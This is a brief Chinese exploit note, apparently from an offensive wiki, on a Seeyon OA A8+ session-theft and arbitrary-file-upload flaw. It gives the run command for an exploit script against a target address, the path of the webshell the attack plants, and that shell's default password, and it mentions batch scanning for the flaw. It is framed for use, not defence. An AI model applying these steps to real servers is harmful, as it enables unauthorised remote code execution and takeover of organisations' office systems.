Session 任意文件上传 漏洞概述¶ 致远OA通过发送特殊请求获取session,通过文件上传接口上传压缩包解压后可Getshell 影响范围¶ A8+ POC¶ 大宝剑可批量扫描此漏洞,有误报性,配合EXP验证 EXP¶ #脚本在此目录下 python session-rce.py http://192.168.1.100 Shell地址:/seeyon/common/designer/pageLayout/a234.jspx 默认密码:rebeyond